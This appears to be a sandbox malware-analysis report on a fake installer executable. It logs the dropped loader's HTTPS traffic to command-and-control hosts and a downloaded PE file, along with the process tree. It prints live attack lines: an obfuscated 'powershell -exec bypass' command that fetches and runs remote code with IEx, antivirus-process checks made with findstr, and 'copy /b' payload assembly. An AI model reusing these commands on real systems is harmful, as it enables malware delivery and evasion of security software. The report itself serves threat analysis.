{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hwp143WT4bhTEtKSJ7QQNxPhwU4fAzMc%2FBqZXHbvlEx72m5J8R9puaGdebOXPlq94aC6rLml3Re3virt0b1JoKPT8pjnLLnp3idIiqbxJJuJj7X262qZCfeBxTKUULDB%2FwkMepA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9b52075bd15589-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1492&min_rtt=1482&rtt_var=576&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2051&delivery_rate=1867007&cwnd=226&unsent_bytes=0&cid=e08c5349ff303ebb&ts=868&x=0"
2024-12-29 16:55:55 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-29 16:55:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49746	104.21.42.198	443	7716	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com

Timestamp	Bytes transferred	Direction	Data
2024-12-29 16:55:56 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 115 Host: imbibelubmbe.click
2024-12-29 16:55:56 UTC	115	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 70 73 79 63 68 65 26 6a 3d 61 61 37 37 65 37 38 62 36 62 30 64 64 31 62 32 32 32 36 65 37 62 37 39 39 35 33 32 61 62 33 61 26 68 77 69 64 3d 32 37 34 37 36 44 32 43 30 36 44 44 35 31 41 43 46 30 34 39 34 38 31 45 36 35 38 30 43 44 31 43 Data Ascii: act=get_message&ver=4.0&lid=jMw1IE--psyche&j=aa77e78b6b0dd1b2226e7b799532ab3a&hwid=27476D2C06DD51ACF049481E6580CD1C
2024-12-29 16:55:57 UTC	1134	IN	HTTP/1.1 200 OK Date: Sun, 29 Dec 2024 16:55:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=878jfri8i8d9ub3p1qahqr1peo; expires=Thu, 24 Apr 2025 10:42:36 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WeebED23LJFbgIE6rArg9%2B7nBpGC41C%2FV2JCgg4RCa1nx3%2FBuE32EghCNktTIfNIx%2B%2BeGG1TiM2%2FYSWGh4MVWMdijIqLwX9FnIXImMrT37tZQjZFh8Z1lt9ys3ensvJTrMgH8ss%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9b5214a90a18c8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1477&min_rtt=1472&rtt_var=563&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1018&delivery_rate=1922317&cwnd=148&unsent_bytes=0&cid=f2248508d05d8bd9&ts=795&x=0"
2024-12-29 16:55:57 UTC	218	IN	Data Raw: 64 34 0d 0a 65 66 58 56 65 6c 6f 4e 56 62 2f 44 35 39 42 72 72 6d 30 4f 33 59 77 35 51 51 73 6f 4e 46 43 44 41 41 6a 67 38 51 7a 63 5a 4c 73 69 6a 76 63 50 65 44 64 33 31 37 65 54 6f 42 69 55 4d 53 47 42 6f 31 6f 6b 62 46 30 61 49 2b 74 76 65 4c 7a 65 4e 4f 6c 54 6a 30 76 44 35 30 35 75 4f 77 6d 51 73 34 2f 2b 48 39 59 5a 4c 50 47 75 58 7a 55 70 45 67 5a 38 6f 57 55 71 32 73 42 78 38 42 2b 5a 44 4e 66 76 57 44 4a 35 49 63 2b 77 33 59 78 45 38 6b 4a 6c 73 65 56 4a 4e 33 35 46 58 53 50 32 61 53 61 54 6d 57 4f 73 4f 4a 51 51 6d 36 45 6c 4f 57 45 6c 34 4c 43 50 73 55 58 61 46 58 72 2f 6f 42 73 6e 66 77 6f 4f 59 4b 38 69 62 63 4c 4c 50 4b 45 35 0d 0a Data Ascii: d4efXVeloNVb/D59Brrm0O3Yw5QQsoNFCDAAjg8QzcZLsijvcPeDd317eToBiUMSGBo1okbF0aI+tveLzeNOlTj0vD505uOwmQs4/+H9YZLPGuXzUpEgZ8oWUq2sBx8B+ZDNfvWDJ5Ic+w3YxE8kJlseVJN35FXSP2aSaTmWOsOJQQm6ElOWEl4LCPsUXaFXr/oBsnfwoOYK8ibcLLPKE5
2024-12-29 16:55:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49752	185.161.251.21	443	7716	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com

Timestamp	Bytes transferred	Direction	Data
2024-12-29 16:55:59 UTC	201	OUT	GET /8574262446/ph.txt HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: cegu.shop
2024-12-29 16:55:59 UTC	249	IN	HTTP/1.1 200 OK Server: nginx/1.26.2 Date: Sun, 29 Dec 2024 16:55:59 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 329 Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT Connection: close ETag: "676c9e2a-149" Accept-Ranges: bytes
2024-12-29 16:55:59 UTC	329	IN	Data Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49758	172.67.208.58	443	7716	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com

Timestamp	Bytes transferred	Direction	Data
2024-12-29 16:56:01 UTC	206	OUT	GET /int_clp_sha.txt HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: klipvumisui.shop
2024-12-29 16:56:02 UTC	901	IN	HTTP/1.1 200 OK Date: Sun, 29 Dec 2024 16:56:02 GMT Content-Type: text/plain Content-Length: 8767044 Connection: close Accept-Ranges: bytes ETag: "51f99eddd33cc04fb0f55f873b76d907" Last-Modified: Sat, 28 Dec 2024 20:49:42 GMT Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EiYH0XbrLV0W7GW8GdD9KKoiRw%2FnOl4Ve5RB3RIB%2B9FU2o3bhnWuGg4BAE0EEcMTdXEvmB9Puq8F8M113xLRTll5szdBzkX3wxbvNdJ%2BG7HxTkKT7ZUKVtjJSVuMlSYPBVWk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9b5233c9f30f51-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1590&min_rtt=1546&rtt_var=611&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2866&recv_bytes=820&delivery_rate=1888745&cwnd=204&unsent_bytes=0&cid=3178afc4e8aa315a&ts=737&x=0"
2024-12-29 16:56:02 UTC	468	IN	Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZP@!L!This program must be run under Win32$7
2024-12-29 16:56:02 UTC	1369	IN	Data Raw: 00 00 00 00 d4 52 0b 00 5c 02 00 00 00 60 0b 00 a4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 56 0a 00 00 10 00 00 00 58 0a 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 64 1b 00 00 00 70 0a 00 00 1c 00 00 00 5c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 38 38 00 00 00 90 0a 00 00 3a 00 00 00 78 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 58 72 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 0f 00 00 00 50 0b 00 00 10 00 00 00 b2 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 a4 01 00 00 00 60 0b 00 00 02 00 Data Ascii: R\`.textVX `.itextdp\ `.data88:x@.bssXr.idataP@.didata`
2024-12-29 16:56:02 UTC	1369	IN	Data Raw: 07 48 52 45 53 55 4c 54 04 00 00 00 80 ff ff ff 7f 02 00 44 13 40 00 0e 05 54 47 55 49 44 10 00 00 00 00 00 00 00 00 04 00 00 00 e4 10 40 00 00 00 00 00 02 02 44 31 02 00 cc 10 40 00 04 00 00 00 02 02 44 32 02 00 cc 10 40 00 06 00 00 00 02 02 44 33 02 00 00 00 00 00 08 00 00 00 02 02 44 34 02 00 02 00 06 00 0b 40 76 40 00 0c 26 6f 70 5f 45 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 0b 28 9c 4a 00 0e 26 6f 70 5f 49 6e 65 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 09 28 9c 4a 00 05 45 6d 70 74 79 00 00 40 13 40 00 00 02 00 09 28 9c 4a 00 06 43 72 65 61 74 65 00 00 40 13 40 00 02 02 00 00 00 00 04 44 Data Ascii: HRESULTD@TGUID@D1@D2@D3D4@v@&op_Equality@@@Left@@Right(J&op_Inequality@@@Left@@Right(JEmpty@@(JCreate@@D
2024-12-29 16:56:02 UTC	1369	IN	Data Raw: fe ff 72 1f 40 00 4d 00 ff ff 00 00 07 54 4f 62 6a 65 63 74 26 00 b8 7d 40 00 06 43 72 65 61 74 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 24 00 e8 7d 40 00 04 46 72 65 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 28 9c 4a 00 09 44 69 73 70 6f 73 65 4f 66 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 3e 00 f4 7d 40 00 0c 49 6e 69 74 49 6e 73 74 61 6e 63 65 03 00 9c 1f 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 00 11 40 00 01 00 08 49 6e 73 74 61 6e 63 65 02 00 02 00 2f 00 94 7e 40 00 0f 43 6c 65 61 6e 75 70 49 6e 73 74 61 6e 63 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 28 9c 4a 00 09 43 6c 61 73 Data Ascii: r@MTObject&}@Create@Self$}@Free@Self)(JDisposeOf@Self>}@InitInstance@Self@Instance/~@CleanupInstance@Self)(JClas
2024-12-29 16:56:02 UTC	1369	IN	Data Raw: 00 01 01 02 00 02 00 5b 00 e8 80 40 00 11 53 61 66 65 43 61 6c 6c 45 78 63 65 70 74 69 6f 6e 03 00 28 13 40 00 08 00 03 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 08 9c 1f 40 00 01 00 0c 45 78 63 65 70 74 4f 62 6a 65 63 74 02 00 00 00 11 40 00 02 00 0a 45 78 63 65 70 74 41 64 64 72 02 00 02 00 31 00 08 81 40 00 11 41 66 74 65 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 0c 81 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 39 00 10 81 40 00 08 44 69 73 70 61 74 63 68 03 00 00 00 00 00 08 00 02 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 07 4d 65 73 73 61 67 65 02 00 02 00 3f 00 Data Ascii: [@SafeCallException(@@Self@ExceptObject@ExceptAddr1@AfterConstruction@Self1@BeforeDestruction@Self9@Dispatch@SelfMessage?
2024-12-29 16:56:02 UTC	1369	IN	Data Raw: 9c 10 40 00 02 00 05 41 46 6c 61 67 02 00 02 b8 12 40 00 08 00 05 41 44 61 74 61 02 00 02 00 00 5c 23 40 00 07 0f 48 50 50 47 45 4e 41 74 74 72 69 62 75 74 65 b8 22 40 00 34 20 40 00 00 00 06 53 79 73 74 65 6d 00 00 00 00 02 00 00 00 00 00 8c 23 40 00 14 08 50 4d 6f 6e 69 74 6f 72 8c 24 40 00 02 00 a0 23 40 00 14 17 54 4d 6f 6e 69 74 6f 72 2e 50 57 61 69 74 69 6e 67 54 68 72 65 61 64 c0 23 40 00 02 00 00 c4 23 40 00 0e 17 54 4d 6f 6e 69 74 6f 72 2e 54 57 61 69 74 69 6e 67 54 68 72 65 61 64 0c 00 00 00 00 00 00 00 00 03 00 00 00 9c 23 40 00 00 00 00 00 02 04 4e 65 78 74 02 00 e4 10 40 00 04 00 00 00 02 06 54 68 72 65 61 64 02 00 00 11 40 00 08 00 00 00 02 09 57 61 69 74 45 76 65 6e 74 02 00 02 00 00 00 00 00 00 2c 24 40 00 0e 12 54 4d 6f 6e 69 74 6f 72 2e Data Ascii: @AFlag@AData\#@HPPGENAttribute"@4 @System#@PMonitor$@#@TMonitor.PWaitingThread#@#@TMonitor.TWaitingThread#@Next@Thread@WaitEvent,$@TMonitor.
2024-12-29 16:56:02 UTC	1369	IN	Data Raw: 6e 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 ec f1 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 2b 00 00 f2 40 00 0b 4e 65 77 49 6e 73 74 61 6e 63 65 03 00 9c 1f 40 00 08 00 01 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 14 29 40 00 07 11 54 49 6e 74 65 72 66 61 63 65 64 4f 62 6a 65 63 74 2c 28 40 00 9c 1f 40 00 00 00 06 53 79 73 74 65 6d 00 00 01 00 02 47 29 40 00 02 00 02 00 00 00 9c 10 40 00 d4 f1 40 00 00 00 00 00 01 00 00 00 00 00 00 80 00 00 00 80 ff ff 08 52 65 66 43 6f 75 6e 74 00 00 cc 83 44 24 04 fc e9 21 c9 00 00 83 44 24 04 fc e9 3f c9 00 00 83 44 24 04 fc e9 41 c9 00 00 cc 6d 29 40 00 Data Ascii: nstruction)@Self1@BeforeDestruction)@Self+@NewInstance@Self)@TInterfacedObject,(@@SystemG)@@@RefCountD$!D$?D$Am)@
2024-12-29 16:56:02 UTC	1369	IN	Data Raw: 02 08 56 42 6f 6f 6c 65 61 6e 02 00 00 11 40 00 08 00 00 00 02 08 56 55 6e 6b 6e 6f 77 6e 02 00 64 10 40 00 08 00 00 00 02 09 56 53 68 6f 72 74 49 6e 74 02 00 b4 10 40 00 08 00 00 00 02 05 56 42 79 74 65 02 00 cc 10 40 00 08 00 00 00 02 05 56 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 09 56 4c 6f 6e 67 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 07 56 55 49 6e 74 33 32 02 00 14 11 40 00 08 00 00 00 02 06 56 49 6e 74 36 34 02 00 34 11 40 00 08 00 00 00 02 07 56 55 49 6e 74 36 34 02 00 00 11 40 00 08 00 00 00 02 07 56 53 74 72 69 6e 67 02 00 00 11 40 00 08 00 00 00 02 04 56 41 6e 79 02 00 d4 2b 40 00 08 00 00 00 02 06 56 41 72 72 61 79 02 00 00 11 40 00 08 00 00 00 02 08 56 50 6f 69 6e 74 65 72 02 00 00 11 40 00 08 00 00 00 02 08 56 55 53 74 72 69 6e 67 Data Ascii: VBoolean@VUnknownd@VShortInt@VByte@VWord@VLongWord@VUInt32@VInt644@VUInt64@VString@VAny+@VArray@VPointer@VUString
2024-12-29 16:56:02 UTC	1369	IN	Data Raw: 00 24 17 40 00 f8 7e 40 00 00 7f 40 00 f0 80 40 00 e8 80 40 00 08 81 40 00 0c 81 40 00 10 81 40 00 04 81 40 00 8c 7d 40 00 a4 7d 40 00 d8 7d 40 00 00 00 43 00 9b 35 40 00 44 00 f4 ff c1 35 40 00 41 00 f4 ff e6 35 40 00 41 00 f4 ff 0c 36 40 00 41 00 f4 ff 34 36 40 00 41 00 f4 ff 62 36 40 00 41 00 f4 ff 90 36 40 00 43 00 f4 ff c6 36 40 00 43 00 f4 ff 11 37 40 00 43 00 f4 ff 45 37 40 00 43 00 f4 ff a7 37 40 00 43 00 f4 ff 09 38 40 00 43 00 f4 ff 6b 38 40 00 43 00 f4 ff cd 38 40 00 43 00 f4 ff 2f 39 40 00 43 00 f4 ff 91 39 40 00 43 00 f4 ff f3 39 40 00 43 00 f4 ff 55 3a 40 00 43 00 f4 ff b7 3a 40 00 43 00 f4 ff 19 3b 40 00 43 00 f4 ff 7b 3b 40 00 43 00 f4 ff dd 3b 40 00 43 00 f4 ff 3f 3c 40 00 43 00 f4 ff a1 3c 40 00 43 00 f4 ff 03 3d 40 00 43 00 f4 ff 65 3d Data Ascii: $@~@@@@@@@@}@}@}@C5@D5@A5@A6@A46@Ab6@A6@C6@C7@CE7@C7@C8@Ck8@C8@C/9@C9@C9@CU:@C:@C;@C{;@C;@C?<@C<@C=@Ce=
2024-12-29 16:56:02 UTC	1369	IN	Data Raw: 4c 40 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 3c 4c 40 00 01 00 03 53 72 63 02 00 00 9c 10 40 00 02 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 08 32 40 00 0c 00 04 44 65 73 74 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 08 32 40 00 01 00 03 53 72 63 02 00 01 3c 4c 40 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 Data Ascii: L@Dest@StartIndex@Countb(JCopySelf<L@Src@StartIndex2@Dest@Countb(JCopySelf2@Src<L@Dest@StartIndex@Countb(JCop

Target ID:	0
Start time:	11:54:53
Start date:	29/12/2024
Path:	C:\Users\user\Desktop\installer_1.05_36.5.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\installer_1.05_36.5.exe"
Imagebase:	0x400000
File size:	1'080'005 bytes
MD5 hash:	8850838982A2E4F34598328ED33A3CDA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	11:54:54
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c move Counts Counts.cmd & Counts.cmd
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	11:54:54
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	11:54:56
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xc50000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	11:54:56
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "opssvc wrsa"
Imagebase:	0xf70000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	11:54:57
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xc50000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	11:54:57
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:	0xf70000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	11:54:57
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 373155
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	11:54:58
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\extrac32.exe
Wow64 process (32bit):	true
Commandline:	extrac32 /Y /E French
Imagebase:	0x7ff71e800000
File size:	29'184 bytes
MD5 hash:	9472AAB6390E4F1431BAA912FCFF9707
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	11:54:58
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "rangers" Tender
Imagebase:	0xf70000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	11:54:58
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b 373155\Pens.com + Limited + Guardian + Stationery + Checklist + Draft + Acids + Norway + Cord + Within + N + Nv 373155\Pens.com
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	11:54:59
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Comparing + ..\Void + ..\Hobby + ..\Death + ..\You + ..\Happen + ..\Fusion a
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	11:54:59
Start date:	29/12/2024
Path:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com
Wow64 process (32bit):	true
Commandline:	Pens.com a
Imagebase:	0x80000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	11:54:59
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0x3d0000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	11:55:59
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
Imagebase:	0xde0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	11:55:59
Start date:	29/12/2024
